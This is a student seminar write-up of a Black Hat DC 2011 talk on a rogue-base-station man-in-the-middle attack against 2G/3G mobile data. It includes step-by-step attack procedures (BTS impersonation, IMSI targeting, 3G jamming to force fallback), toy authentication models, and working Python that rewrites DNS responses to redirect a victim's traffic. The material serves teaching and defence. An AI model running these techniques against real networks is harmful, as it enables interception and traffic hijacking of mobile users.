  • 7/28/2019 4MMSR-2011-2012-Student Seminar-A Practical Attack Against GPRS EDGE UMTS HSPA Mobile Data Communications - David Perez, Jose Pico - Black-Hat DC 2011

A practical attack against GPRS/EDGE/UMTS/HSPA mobile data communications

Matiaz Ouine : [email protected]
Benoît Raymond : [email protected]

ENSIMAG - 4MMSR : Network Security - Student Seminar, 20/03/2012 (17 slides)

Keywords : GPRS, EDGE, UMTS, BTS, MS, authentication, encryption

Original talk: David Perez - [email protected], Jose Pico - [email protected]
Black Hat DC 2011 (Jan. 18-19)

Summary

- Background - Vocabulary
- Presentation of the talk
- Description of the GSM Architecture
- Vulnerabilities
- Attack implementation
- Possibilities offered by the attack
- Countermeasures
- Limitations
- Conclusion
- References

Paper's authors

David Perez and Jose Pico, co-founders and senior security analysts at Taddong

Skills: network, web applications, mobile communications, VoIP, etc.

Latest paper: "New attack scenarios with rogue base stations", RootedCON 2012 (3/03/2012)

Background - Vocabulary

Background of the talk: the protocol stack (figure: Access Stratum in UMTS; Non-Access Stratum in UMTS, where the authentication and ciphering procedures live, the main subject of the talk)

Vocabulary
- GPRS = packet data over GSM (2G, commonly labelled 2.5G); EDGE = enhanced GPRS (2.75G)
- UMTS = 3G; HSPA = 3.5G (= 3G+)
- MS = Mobile Station (e.g. phone, tablet, computer with a 3G modem, ...)
- IMEI = unique identifier of the handset hardware
- IMSI = unique identifier of the SIM card (the subscriber)
- USIM key (Ki) = secret key shared between the (U)SIM and the operator's authentication centre; it never leaves the SIM and is never sent over the air

Presentation of the talk

A practical attack against GPRS/EDGE/UMTS/HSPA (2G/3G) mobile data communications
- Budget < $10,000
- Exploitation of three vulnerabilities of 2G/3G

Description of the GSM Architecture (1/2)

(Figure: GSM/GPRS network architecture. Legend: voice path, e.g. SMS/MMS/voice call; data path, e.g. HTTP, DNS, VoIP, P2P, ...)

Description of the GSM Architecture (2/2)

- Circuit switched
- Two communication channels: uplink and downlink
- GSM medium access: TDMA

Vulnerabilities

1. Lack of mutual authentication in GPRS/EDGE
- Unidirectional authentication: the MS (Mobile Station) authenticates to the network, but the network never proves its identity to the MS, so a rogue BTS can impersonate the operator

2. Negotiation of the encryption algorithm
- The MS indicates the encryption algorithms it supports (e.g. GEA-0, GEA-1, ...)
- The network (BTS/SGSN) chooses one of them; the MS has no say in the choice
- GEA-0 = no encryption at all

3. Fall back to GPRS/EDGE
- UMTS/HSPA uses mutual authentication
- The MS falls back to the GSM/GPRS/EDGE network when no UMTS/HSPA network is available
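The first two vulnerabilities, as an added example that is not part of the original slides or of the Perez/Pico paper. It is a toy model of the GPRS attach exchange: the class names, the message shapes, the SHA-256 stand-in for the SIM's A3 algorithm, the "pick the highest GEA" operator policy and the `refuse_gea0` switch are all assumptions (real basebands expose no such switch, which is precisely why the slides' countermeasures live above the access layer). What the model preserves is the structure on the slide: the MS answers a challenge it cannot attribute to anyone, advertises its GEA algorithms, and lets the network choose, GEA0 included.

```python
"""Toy model of GPRS attach: one-way authentication plus network-chosen ciphering.

Added example for this write-up, not code from the talk. Constructed values
and simplified message shapes throughout.
"""
from dataclasses import dataclass, field
import hashlib
import os

# Ki never leaves the SIM / operator AuC. Constructed test value.
KI = bytes.fromhex("0123456789abcdef0123456789abcdef")


def a3_sres(ki: bytes, rand: bytes) -> bytes:
    """Stand-in for the SIM's A3 algorithm (real SIMs use COMP128 or MILENAGE):
    a 32-bit response to a 128-bit challenge."""
    return hashlib.sha256(ki + rand).digest()[:4]


@dataclass
class MobileStation:
    ki: bytes
    # "MS Network Capability": GEA algorithms the handset supports. GEA0
    # (no ciphering) is always available and is not advertised.
    supported_gea: tuple = ("GEA1", "GEA2")
    refuse_gea0: bool = False  # hypothetical hardening switch, see lead-in

    def attach(self, network):
        """GMM Attach: challenge-response, then the network's cipher choice."""
        rand = network.authentication_request()
        # No AUTN, nothing to verify: the MS cannot tell a rogue network from
        # the operator. It simply answers the challenge.
        sres = a3_sres(self.ki, rand)
        chosen = network.authentication_response(sres, self.supported_gea)
        if chosen == "GEA0" and self.refuse_gea0:
            return ("rejected", chosen)
        if chosen not in ("GEA0",) + self.supported_gea:
            return ("rejected", chosen)
        return ("attached", chosen)


@dataclass
class OperatorSGSN:
    """Legitimate network: knows Ki, verifies SRES, picks the strongest
    algorithm the MS supports (assumed policy)."""
    ki: bytes
    _rand: bytes = field(default=b"", repr=False)

    def authentication_request(self) -> bytes:
        self._rand = os.urandom(16)
        return self._rand

    def authentication_response(self, sres: bytes, ms_gea: tuple) -> str:
        if sres != a3_sres(self.ki, self._rand):
            return "auth-failure"
        return max(ms_gea)


@dataclass
class RogueSGSN:
    """Attacker's network (the OpenBSC/OsmoSGSN role in the talk): has no Ki,
    so it cannot check SRES, and nothing forces it to. It then selects GEA0
    so the victim's IP traffic crosses the air interface in the clear."""
    def authentication_request(self) -> bytes:
        return os.urandom(16)  # any value will do: the answer is ignored

    def authentication_response(self, sres: bytes, ms_gea: tuple) -> str:
        return "GEA0"


def demo():
    """Returns (operator run, rogue run, rogue run against a hardened MS)."""
    ms = MobileStation(KI)
    legit = ms.attach(OperatorSGSN(KI))
    rogue = ms.attach(RogueSGSN())
    hardened = MobileStation(KI, refuse_gea0=True).attach(RogueSGSN())
    return legit, rogue, hardened


if __name__ == "__main__":
    for label, result in zip(("operator", "rogue", "rogue vs hardened MS"), demo()):
        print(f"{label:22s} -> {result}")
```

The rogue run succeeds without the attacker ever knowing Ki: the challenge is answered because the MS has no way to refuse it, and GEA0 is accepted because the network alone selects the algorithm. Even a handset that insisted on GEA1/GEA2 would only force the rogue network to relay the challenge to the real operator or to break the weak GEA ciphers; the slides' remedy is therefore to protect the data above the access layer and to disable 2G entirely.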

Attack implementation (1/3): Experimental setup

(Figure: rogue network built from open-source components)
- OpenBSC implements the BSC, MSC and HLR
- OsmoSGSN implements the SGSN
- OpenGGSN implements the GGSN

Attack implementation (2/3): Description of each step

1. Position of the attacker: be close enough to the target
2. Listen to the radio spectrum: find a free frequency neighbouring the real BTS's frequencies
3. Configure the rogue BTS to transmit on the chosen frequency
4. Take the identity of the real BTS (broadcast the same network identity), so the MS treats the rogue cell as one of its operator's cells
5. Set up the BTS to accept only the connection of the target, identified by its IMSI / IMEI
6. Provide a working uplink to the Internet: configure OsmoSGSN, OpenGGSN and the routing tables
7. Power up the BTS
8. Read / modify / redirect the IP packets sent and received by the victim
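The last step of the procedure above, as an added example that is not part of the original slides or of the Perez/Pico paper. Once the victim is attached, the attacker's GGSN is the victim's default route and every IP packet appears in plain text on a host the attacker controls. The function below rewrites the A record inside a DNS response so that the victim's next HTTP connection to the queried name lands on an attacker-chosen address. The packet it works on is a constructed IPv4/UDP/DNS response (not a capture); the addresses are documentation ranges and the "attacker proxy" at 192.0.2.66 is an assumption. In a live setup the same function would be fed packets from the GGSN's tunnel interface, which is outside this snippet.

```python
"""Rewrite A records in a DNS response seen at the attacker's GGSN.

Added example, not code from the talk. Sample packet is constructed inline.
"""
import socket
import struct


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement checksum over an IPv4 header."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def skip_name(msg: bytes, off: int) -> int:
    """Advance past a DNS name made of labels and/or a compression pointer."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:      # compression pointer: 2 bytes, ends the name
            return off + 2
        if length == 0:
            return off + 1
        off += 1 + length


def rewrite_a_records(packet: bytes, new_ip: str) -> bytes:
    """Return a copy of an IPv4/UDP DNS response whose A-record answers all
    point at new_ip. Anything that is not a resolver reply is returned as is."""
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 17:                  # protocol 17 = UDP
        return packet
    udp = ihl
    sport = struct.unpack("!H", packet[udp:udp + 2])[0]
    if sport != 53:                      # only replies coming from a resolver
        return packet
    dns = udp + 8
    qd, an = struct.unpack("!HH", packet[dns + 4:dns + 8])
    off = dns + 12
    for _ in range(qd):                  # skip the question section
        off = skip_name(packet, off) + 4
    buf = bytearray(packet)
    for _ in range(an):
        off = skip_name(packet, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:      # A record, class IN
            buf[off:off + 4] = socket.inet_aton(new_ip)
        off += rdlen
    # UDP checksum is optional over IPv4: 0 means "not computed" (RFC 768).
    buf[udp + 6:udp + 8] = b"\x00\x00"
    # Recompute the IP header checksum (required whenever the header is touched).
    buf[10:12] = b"\x00\x00"
    buf[10:12] = struct.pack("!H", ip_checksum(bytes(buf[:ihl])))
    return bytes(buf)


def build_dns_response(src: str, dst: str, name: str, answer_ip: str) -> bytes:
    """Construct a minimal IPv4/UDP/DNS response (sample input, not captured)."""
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    question = qname + struct.pack("!HH", 1, 1)
    # The answer name is a compression pointer (0xC00C) back to the question.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + socket.inet_aton(answer_ip)
    dns = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0) + question + answer
    udp = struct.pack("!HHHH", 53, 40000, 8 + len(dns), 0) + dns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0x4000, 64, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return ip + udp


def answered_ip(packet: bytes) -> str:
    """First A-record address in a packet shaped like build_dns_response's."""
    ihl = (packet[0] & 0x0F) * 4
    off = skip_name(packet, ihl + 8 + 12) + 4      # past the question
    off = skip_name(packet, off) + 10              # past answer name and fixed fields
    return socket.inet_ntoa(packet[off:off + 4])


if __name__ == "__main__":
    pkt = build_dns_response("10.0.0.53", "10.45.0.2", "bank.example", "198.51.100.10")
    forged = rewrite_a_records(pkt, "192.0.2.66")  # attacker's proxy (assumed)
    print(answered_ip(pkt), "->", answered_ip(forged))
```

Nothing in GPRS/EDGE stops this: the access layer authenticated the victim to the attacker, not the other way round, and the attacker chose no ciphering. It also shows why the slides recommend TLS or IPsec: a client that validates the server certificate will refuse the redirected host, while a plain HTTP client will not notice.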

Attack implementation (3/3): Extension to 3G

- Create interference in the UMTS frequency bands: use a jammer
- UMTS spectrum allocation in France: 900 MHz and 2100 MHz
- This exploits the 3rd vulnerability: deprived of 3G coverage, the MS falls back to GPRS/EDGE and attaches to the rogue 2G network

Possibilities offered by the attack

Possibilities: sniff traffic, redirect traffic, compromise the victim's LAN, ... Full man in the middle!

Security properties violated on the transmitted data
- Confidentiality: the attacker can read transmitted data
- Integrity: the attacker can modify transmitted data
- Authenticity: messages do not come from the assumed sender (man in the middle)
- Freshness: the attacker can replay old transmitted data

Security properties violated on the user identity
- Privacy: the attacker learns the victim's private identity data (IMSI, IMEI)

Security properties violated on the communication system
- Availability: the attacker's rogue cell cannot serve all the users it captures
- Traceability: the mobile operator is no longer able to log the victim's actions

Countermeasures (1/2)

- Use an upper-layer protocol to ensure endpoint authentication and encryption (e.g. SSL/TLS, IPsec, ...): once the access layer is compromised, authentication and encryption must be ensured above it
- Use only UMTS/HSPA: do not accept fall back to 2G
  - iPhone: requires a jailbreak
  - Android / Windows Mobile / Symbian: network settings (WCDMA only)

Countermeasures (2/2): UMTS authentication

Mutual authentication (figure: UMTS AKA flow)
- Step 1: the network sends the MS a challenge RAND together with an authentication token AUTN
- Step 2: the MS checks whether AUTN really comes from the assumed HLR (its MAC verifies under Ki). YES => step 3; NO => STOP
- Step 3: the network checks XRES = RES? YES => authentication OK; NO => STOP

UMTS encryption
- Data: UMTS Encryption Algorithm 1 (UEA1), based on KASUMI
- Symmetric encryption, 64-bit block
- Key: 128 bits (the cipher key CK, derived from the USIM key Ki during authentication; Ki itself is never used directly)

UMTS integrity
- MAC (Message Authentication Code) on signalling messages
- Birthday-paradox attack: about 2^33 packets needed => not realistic in UMTS
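Steps 1 to 3 of the UMTS authentication above, as an added example that is not part of the original slides or of the Perez/Pico paper. It is a toy UMTS AKA run: the real f1..f5 functions are MILENAGE (AES-based); here they are HMAC-SHA256 truncations with distinct labels, which keeps the protocol structure but is not the 3GPP algorithm set. The key value is constructed, and SQN handling is simplified (no resynchronisation procedure, no acceptance window). The point it demonstrates is the one the slide makes against GSM: a network that does not hold Ki cannot produce a valid AUTN, so the USIM stops at step 2 and never hands a response to a rogue network.

```python
"""Toy UMTS AKA: the USIM verifies AUTN before answering.

Added example, not code from the talk. HMAC-SHA256 stands in for MILENAGE.
"""
import hashlib
import hmac
import os

K = bytes.fromhex("465b5ce8b199b49faa5f0a2ee238a6bc")  # constructed 128-bit K (Ki)
AMF = b"\x80\x00"                                        # authentication management field


def f(label: bytes, k: bytes, *parts: bytes, n: int) -> bytes:
    """Keyed derivation standing in for MILENAGE f1/f2/f3/f4/f5 (assumption)."""
    return hmac.new(k, label + b"".join(parts), hashlib.sha256).digest()[:n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class HLR_AuC:
    """Operator side: holds K and generates authentication vectors."""
    def __init__(self, k: bytes):
        self.k, self.sqn = k, 0

    def vector(self):
        self.sqn += 1
        sqn = self.sqn.to_bytes(6, "big")
        rand = os.urandom(16)
        mac = f(b"f1", self.k, rand, sqn, AMF, n=8)   # proves the network knows K
        xres = f(b"f2", self.k, rand, n=8)            # expected MS response
        ck = f(b"f3", self.k, rand, n=16)             # cipher key, input to UEA1
        ik = f(b"f4", self.k, rand, n=16)             # integrity key, input to UIA1
        ak = f(b"f5", self.k, rand, n=6)              # anonymity key hides SQN
        autn = xor(sqn, ak) + AMF + mac
        return rand, xres, ck, ik, autn


class USIM:
    """Subscriber side: same K; verifies AUTN (slide step 2) before answering."""
    def __init__(self, k: bytes):
        self.k, self.sqn_seen = k, 0

    def challenge(self, rand: bytes, autn: bytes):
        ak = f(b"f5", self.k, rand, n=6)
        sqn = xor(autn[:6], ak)
        amf, mac = autn[6:8], autn[8:16]
        if not hmac.compare_digest(mac, f(b"f1", self.k, rand, sqn, amf, n=8)):
            return None                   # MAC failure: not our network -> STOP
        if int.from_bytes(sqn, "big") <= self.sqn_seen:
            return None                   # stale SQN: replayed vector -> STOP
        self.sqn_seen = int.from_bytes(sqn, "big")
        return f(b"f2", self.k, rand, n=8)   # RES; network compares with XRES (step 3)


def run_aka(network_k: bytes, usim_k: bytes = K) -> str:
    """One AKA run between a USIM holding usim_k and a network holding network_k."""
    net, usim = HLR_AuC(network_k), USIM(usim_k)
    rand, xres, _ck, _ik, autn = net.vector()
    res = usim.challenge(rand, autn)
    if res is None:
        return "MS rejects network"
    return "authenticated" if hmac.compare_digest(res, xres) else "network rejects MS"


def run_replay() -> str:
    """Attacker replays an observed (RAND, AUTN): the MAC still verifies, but
    the SQN is no longer fresh, so the USIM refuses anyway."""
    net, usim = HLR_AuC(K), USIM(K)
    rand, _, _, _, autn = net.vector()
    usim.challenge(rand, autn)            # genuine run consumes this SQN
    return "MS rejects replay" if usim.challenge(rand, autn) is None else "replay accepted"


if __name__ == "__main__":
    print("operator :", run_aka(K))
    print("rogue    :", run_aka(os.urandom(16)))   # attacker does not know K
    print("replay   :", run_replay())
```

Compare with GSM/GPRS, where the network sends RAND alone: there is no AUTN to check, so the MS answers any base station that asks. This is why the slides conclude that UMTS itself is not affected, and why the attack has to push a 3G handset down to 2G first.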

Limitations

- Be close enough to the target
- Have a budget of $10,000
- Know the target in advance (IMEI and/or IMSI)
- SMS/MMS/voice calls are impossible. Why? The attacker's network is not connected to the public switched telephone network (PSTN). Hypothesis: use VoIP to get around this problem (forward SMS/MMS/voice calls)

Conclusion

- The GPRS/EDGE architecture is insecure: only the client is authenticated, and the encryption algorithm is negotiated by the network (down to none)
- Be afraid of GPRS/EDGE data connections
- UMTS itself is not impacted by this attack, because of mutual authentication; a 3G handset that falls back to 2G, however, is

References

- GSM architecture: http://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppt
- UMTS frequency bands: https://en.wikipedia.org/wiki/UMTS_frequency_bands
- Security in UMTS, encryption in UMTS: http://sebastien.mougel.free.fr/download/securite_UMTS.ppt
- Authentication and encryption in UMTS: http://freesecure.info/doc/securite-UMTS.pdf and http://www.tcs.hut.fi/Publications/knyberg/eccomas.pdf
- Paper of the talk: http://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdf
- Book (Spanish): "Hacking y seguridad en comunicaciones móviles GSM/GPRS/UMTS/LTE", José Picó García and David Pérez Conde
Questions ?!?!

Attack with the VoIP hypothesis (figure: device A attached to the rogue network, device B on the operator's network)
- Case 1: A calls B; the attacker forwards the call as a VoIP call => attack OK (data: HTTP; SMS/MMS/voice call: forwarded over VoIP)
- Case 2: B calls A; the telephone network cannot find A, since A is attached to the rogue network and not to the operator's. B reaches A's voice mail => attack KO

GSM cells
- One cell has one frequency
- Neighbouring cells have different frequencies
(Figure: cell A and a GSM neighbour cell of A)